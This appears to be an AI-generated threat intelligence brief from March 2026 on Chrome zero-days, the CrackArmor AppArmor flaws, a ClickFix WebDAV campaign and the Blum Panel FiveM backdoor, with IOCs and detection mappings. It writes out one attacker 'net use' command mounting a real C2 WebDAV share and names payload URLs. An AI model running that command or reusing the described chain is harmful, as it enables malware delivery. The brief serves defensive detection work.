Cyber Threat Brief — March 15 2026

⚠️ This report is AI-generated. Always validate findings.

Cyber Threat Brief — March 15 2026


1. Google Chrome Dual Zero-Days (CVE-2026-3909 & CVE-2026-3910) — CISA KEV

Summary

Google patched two high-severity Chrome zero-days on March 12-13 that are confirmed actively exploited in the wild. Both bugs were discovered internally and added to CISA’s KEV catalog on March 13 — federal agencies have until March 27 to patch. One hits Skia’s 2D graphics library (out-of-bounds write), the other hits the V8 JavaScript engine (inappropriate implementation enabling sandbox escape). This is Chrome’s third actively weaponized zero-day of 2026.

What’s New (Last 24 Hours)

  • CISA added both CVE-2026-3909 and CVE-2026-3910 to the Known Exploited Vulnerabilities catalog on 2026-03-13, requiring FCEB patch by 2026-03-27
  • Google confirmed: “exploits for both CVE-2026-3909 and CVE-2026-3910 exist in the wild”
  • Aviatrix TRC analysis (March 14) confirmed attacker chains linking CVE-2026-3909 → CVE-2026-3910 for RCE + privilege escalation before lateral movement
  • Microsoft Edge, Brave, Opera, and Vivaldi users need vendor-specific updates as Chromium-based browsers share the vulnerable code paths

Actionable Intel

ArtifactTypeATT&CK TechniqueData SourceHow to Use
Chrome versions below 146.0.7680.75/76 (Win/macOS) or 146.0.7680.75 (Linux)Vulnerable SoftwareT1203EDR software inventory / asset mgmtAlert on or block execution of outdated Chrome builds; enforce update via policy
Crafted HTML page delivery via browserTTPT1189Web proxy / DNS logsHunt for anomalous browser child processes spawned after visiting external URLs
Unexpected browser child process executionTTPT1203EDR process telemetryAlert on chrome.exe or msedge.exe spawning unexpected child processes (cmd, powershell, wscript)
Out-of-bounds write in Skia (CVE-2026-3909)Exploit MechanismT1203Crash reports / browser telemetryCorrelate crash telemetry from Skia renderer with subsequent suspicious child processes
Sandbox escape via V8 inappropriate impl (CVE-2026-3910)Exploit MechanismT1203EDR / browser sandbox telemetryMonitor for renderer processes making unexpected system calls outside sandbox boundaries

Potential Detection Coverage Based on MITRE ATT&CK Technique

SourceDetectionsCoverage
SplunkNone foundNo direct Splunk ESCU rule for Chrome Skia/V8 exploitation. Supplement with EDR-based browser child process alerting and vulnerable software inventory searches.
ElasticSuspicious Browser Child ProcessFires when Chrome/Edge spawns unusual child processes — directly relevant to post-exploitation behavior following CVE-2026-3909/3910 sandbox escape on macOS.
SigmaSuspicious Browser Child Process - MacOSCovers anomalous child process creation from browser processes, mapping to post-exploitation spawning after Skia/V8 exploitation.

Sources


2. CrackArmor — Nine AppArmor Flaws Enable Local Root on 12.6M Linux Systems

Summary

Qualys TRU disclosed nine confused-deputy vulnerabilities in Linux’s AppArmor security module on March 12, 2026. Dubbed “CrackArmor,” the flaws have existed since kernel v4.11 (2017) and affect Ubuntu, Debian, SUSE, and cloud/Kubernetes/edge deployments. An unprivileged local user can manipulate security profiles via pseudo-files, bypass user-namespace restrictions, trigger kernel stack exhaustion (kernel panic on x86-64), and bypass KASLR via out-of-bounds reads. No CVE IDs yet — upstream kernel process delays assignment by 1-2 weeks post-patch. Qualys developed working PoCs and shared with vendors; public release withheld. The X community is already publishing Sigma-based detection via owLSM.

What’s New (Last 24 Hours)

  • Qualys blog published March 12-13 with full technical breakdown confirming root escalation via Sudo/Postfix tool interactions
  • Community detection response emerging: @SilverPlate3x published Sigma rules via owLSM (kernel-level Sigma rule engine) specifically targeting CrackArmor exploitation patterns
  • Qualys recommends monitoring /sys/kernel/security/apparmor/ for unauthorized profile modifications as an exploitation indicator
  • Scope: 12.6M+ enterprise Linux instances with AppArmor enabled by default (Ubuntu, Debian, SUSE, cloud platforms)
  • No CVE IDs assigned yet — patch tracking requires advisory/kernel version tracking, not CVE lookup

Actionable Intel

ArtifactTypeATT&CK TechniqueData SourceHow to Use
/sys/kernel/security/apparmor/ write events by non-root processesFile System TTPT1548.001Linux auditd / EDR file monitoringAlert on writes to AppArmor pseudo-file paths by unprivileged UIDs; baseline normal values first
Unprivileged process spawning with elevated capabilities after AppArmor profile modificationTTPT1068EDR process telemetry / auditdHunt for unexpected capability grants (CAP_SYS_ADMIN) following profile manipulations
sudo or postfix process interaction with AppArmor profile pathsTTPT1548.001EDR / auditd syscall logDetect confused-deputy: low-privilege processes using high-privilege tools (sudo/postfix) to manipulate profiles
Kernel panic / unexpected reboot after deep AppArmor subprofile removalDoS TTPT1499.004Syslog / kernel crash logsAlert on kernel panics on x86-64 systems; correlate with prior AppArmor operations via auditd
KASLR info leak via out-of-bounds read on AppArmor pseudo-fileTTPT1083Linux auditd reads on /sys/kernel/security/apparmor/Monitor for bulk OOB read patterns on sysfs AppArmor entries from non-privileged contexts
Containers or Kubernetes pods with AppArmor profile disabled/modifiedTTPT1611Kubernetes audit logs / container runtime logsAlert on pods that disable AppArmor profile or switch to unconfined runtime during execution

Potential Detection Coverage Based on MITRE ATT&CK Technique

SourceDetectionsCoverage
SplunkLinux pkexec Privilege EscalationCovers a similar confused-deputy LPE pattern (privileged tool abuse) — useful analog while CrackArmor-specific rules are developed; monitors unexpected pkexec executions that could indicate toolchain abuse.
ElasticKernel Load or Unload via Kexec DetectedDetects kernel manipulation attempts; relevant for monitoring kernel-level exploitation follow-on activity after AppArmor bypass achieves root. Kubernetes Privileged Pod Created covers container escape escalation path via CrackArmor container isolation bypass.
SigmaPrivileged Container DeployedDetects creation of privileged Kubernetes pods — directly relevant to CrackArmor’s container isolation bypass vector where AppArmor profile manipulation removes pod confinement.

Sources


3. ClickFix Evolution — WebDAV + Trojanized Electron App Bypasses Defender

Summary

A new ClickFix variant documented on March 14 replaces the usual PowerShell/mshta stage with a net use WebDAV drive mapping, then executes a trojanized WorkFlowy Electron application with malicious logic injected into the app.asar archive. The campaign bypassed Microsoft Defender for Endpoint entirely — Atos researchers only caught it via behavioral threat hunting on the RunMRU registry key. A parallel campaign tracked by @inf0stache (March 14) shows a separate ClickFix chain delivering XOR+AES-encrypted Donut shellcode that injects a .NET assembly into explorer.exe. Two flavors, same social engineering lure, both requiring defender teams to hunt on behavioral signals rather than signatures.

What’s New (Last 24 Hours)

  • Atos TRC published full technical breakdown on March 14 — first documented ClickFix variant using net use WebDAV as delivery mechanism, evading all standard EDR script-execution detections
  • Malicious WorkFlowy v1.4.1050 (signed by FunRoutine Inc.) distributes with backdoored resources/app.asar; legitimate app signed, malicious logic hidden in Node.js entry point main.js
  • C2 confirmed at 94.156.170[.]255 (WebDAV server), ZIP payload at https://94.156.170[.]255/flowy.zip
  • Lure domain: happyglamper[.]ro (fake CAPTCHA / Win+R prompt)
  • RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) captures user-executed commands including the WebDAV mount — key hunt pivot for this campaign
  • Parallel campaign (inf0stache analysis): ClickFix → mshta → PowerShell → XOR+AES decrypt (SHA256 key derivation with salt+“kizo”) → Donut x64 shellcode → .NET assembly injected into explorer.exe with TripleDES-encrypted C2 config
  • Infosecurity Magazine reports WordPress-delivered ClickFix delivering Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut payloads (March 13)

Actionable Intel

ArtifactTypeATT&CK TechniqueData SourceHow to Use
cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:noCommand LineT1059.003EDR process telemetryAlert on net use with HTTPS WebDAV paths — especially with /persistent:no flag followed by immediate script execution
94.156.170[.]255IP IOCT1105Firewall / proxy / DNS logsBlock and alert on outbound connections to this IP; also block WebDAV (port 443) to untrusted hosts
happyglamper[.]roDomain IOCT1566.002DNS logs / web proxyBlock/alert on DNS queries and HTTP/S connections to this domain
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRURegistry KeyT1204.001EDR registry telemetryHunt RunMRU for net use entries with external HTTPS paths — reliable behavioral indicator for this ClickFix flavor
%LOCALAPPDATA%\MyApp\WorkFlowy.exe / resources\app.asar (v1.4.1050)File PathT1059.007EDR file telemetryAlert on WorkFlowy.exe writing/reading app.asar files to non-standard paths; monitor Electron apps in %LOCALAPPDATA%
PowerShell Invoke-WebRequest downloading ZIP then Expand-Archive to %LOCALAPPDATA%TTPT1105EDR / PowerShell script block loggingAlert on PowerShell download followed by Expand-Archive to user-writable directories
XOR+AES-CBC decrypt with SHA256 key from salt + hardcoded “kizo”Obfuscation TTPT1027.013EDR memory / AV sandboxHunt for multi-layer crypto decryption patterns in PowerShell or .NET processes at runtime
Donut x64 shellcode injected into explorer.exeTTPT1055.001EDR memory injection telemetryAlert on explorer.exe receiving remote thread creation from non-system processes
.NET assembly loaded reflectively into explorer.exeTTPT1055.002EDR memory telemetryDetect reflective PE injection into explorer.exe; watch for SmtpClient-related network calls from this process

Potential Detection Coverage Based on MITRE ATT&CK Technique

SourceDetectionsCoverage
SplunkCMD Carry Out String Command ParameterDetects cmd.exe executing chained string commands — directly fires on the net use WebDAV mount + batch execution pattern seen in this campaign. LOLBAS With Network Traffic covers net.exe/net1.exe making network connections, mapping to the WebDAV drive mount step.
ElasticPotential Execution via FileFix Phishing AttackDirect ClickFix detection rule — covers the Win+R RunMRU execution pattern used in this campaign’s initial access stage. Potential Fake CAPTCHA Phishing Attack detects fake CAPTCHA lures delivering cmd/PowerShell, matching this campaign’s happyglamper.ro lure page.
SigmaSuspicious File Execution From Internet Hosted WebDav ShareHighest-fidelity coverage — directly detects net use + immediate execution from the mapped drive, matching the exact kill chain documented in this campaign. Executable from Webdav covers network-layer detection of executable downloads via WebDAV via Zeek.

Sources


4. Blum Panel — FiveM Gaming Backdoor Fully Reverse-Engineered, 3,856 Servers Infected

Summary

A 16-hour investigation (March 13-14) by Justice Gaming Network fully reversed the Blum Panel, a commercial FiveM backdoor sold for €59.99/month that provides paying customers full remote control over infected GTA:Online roleplay servers. The C2 at 185.87.23.198 was infiltrated without authentication, exposing a database of 3,856 infected servers, 289 players’ PII (real IPs, Discord IDs, Steam IDs), and 7 pre-built RCE payloads. Detection is straightforward: check for GlobalState.miauss and GlobalState.ggWP globals in server console. Built on stolen Cipher Panel code.

What’s New (Last 24 Hours)

  • Full deobfuscated source code, C2 database (sanitized), and payload library published to GitHub on March 14
  • C2 server identified: 185.87.23.198 (Active 1 GmbH, Hamburg, Germany) — no authentication required to extract full database
  • Payload library contains 7 pre-built RCE scripts deployable against any connected FiveM server
  • 28 paying customers identified from billing records
  • Detection confirmed: GlobalState.miauss (dropper) and GlobalState.ggWP (replicator) are active infection indicators in FiveM server console
  • block_c2.sh script published to immediately block the C2 IP
  • Second product (GFX Panel) identified on same unprotected infrastructure

Actionable Intel

ArtifactTypeATT&CK TechniqueData SourceHow to Use
185.87.23.198C2 IPT1219Firewall / network logsBlock outbound to this IP immediately; alert on any established connections from FiveM server hosts
GlobalState.miaussIn-Memory IndicatorT1059.007FiveM server console logsRun if GlobalState.miauss then print("DROPPER ACTIVE") end in console; presence confirms active infection
GlobalState.ggWPIn-Memory IndicatorT1059.007FiveM server console logsRun if GlobalState.ggWP then print("REPLICATOR ACTIVE") end; presence confirms replication component active
Blum Panel / GFX Panel domainsDomain IOCsT1219DNS logsBlock/alert on DNS queries to panel domains; check evidence/infected_servers_sanitized.json for server names
Obfuscated JavaScript with multiple decode layersTTPT1027.002File analysis / AV sandboxScan FiveM resources/ directories for obfuscated JS files with unusual entropy; run scanner from repo
RCE payload delivery via API key to any connected serverTTPT1059.007FiveM server console / resource logsMonitor for unexpected resource loading or execution from authenticated API calls

Potential Detection Coverage Based on MITRE ATT&CK Technique

SourceDetectionsCoverage
SplunkNone foundNo direct Splunk ESCU detection for FiveM/gaming platform backdoors. Use network detection (firewall blocks on 185.87.23.198) and server-side script monitoring as primary controls.
ElasticNetwork Traffic to Rare Destination CountryML-based anomaly detection that would fire on unexpected outbound traffic to Germany (Active 1 GmbH) from gaming server infrastructure if Germany is not a normal destination.
SigmaLocal Network Connection Initiated By Script InterpreterPartially applicable — covers script interpreter network connections; adapt for FiveM’s Node.js/V8 runtime making outbound calls to C2. Primary detection is IOC-based (IP/domain blocklist) and console-side indicator checks.

Sources